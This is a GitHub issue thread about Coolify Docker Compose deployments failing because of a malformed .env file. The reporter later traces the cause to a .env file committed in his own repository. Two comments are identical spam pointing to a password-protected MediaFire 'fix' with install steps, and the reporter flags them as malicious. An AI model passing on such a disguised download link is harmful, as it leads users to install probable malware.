### ISSUE TITLE
[Bug]: Docker Compose application no longer deployable from Git. Error: .env key cannot contain space.

### ISSUE THREAD

**Issue by brandnewx** [coollabsio/coolify#3270]
### Description

So today Docker Compose applications are no longer deployable because Coolify or Coolify Helper docker image has this new bug where it generated a malformed build .env file.

See Deployment logs:

```
[COMMAND] docker exec xo4swgookcwkkckcw0cwso4k bash -c 'SOURCE_COMMIT=4255eb9dde67f6f5790b90ee590d4d7c4ddb4c04 COOLIFY_BRANCH=main docker compose --env-file /artifacts/xo4swgookcwkkckcw0cwso4k/.env --project-name m4kcw4oo4ss88cgcosooc0ws --project-directory /artifacts/xo4swgookcwkkckcw0cwso4k -f /artifacts/xo4swgookcwkkckcw0cwso4k/docker-compose.yml build --pull'
[OUTPUT]
failed to read /artifacts/xo4swgookcwkkckcw0cwso4k/.env: line 4: key cannot contain a space

[2024-Aug-31 06:44:00.474211] Oops something is not okay, are you okay? 😢

[2024-Aug-31 06:44:00.657908] failed to read /artifacts/xo4swgookcwkkckcw0cwso4k/.env: line 4: key cannot contain a space
```

### Minimal Reproduction (if possible, example repository)

Create new application > Git Repository > Choose Docker Compose. Deploy and you'll see the bug.

### Version

v4.0.0-beta.324

### Cloud?

- [ ] Yes
- [X] No

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by brandnewx** [comment]
I'm seeing malicious spams in the comments. Be careful!

**Comment by brandnewx** [comment]
This is my own fault. My git repo has .env file so the Coolify CI couldn't parse that .env.
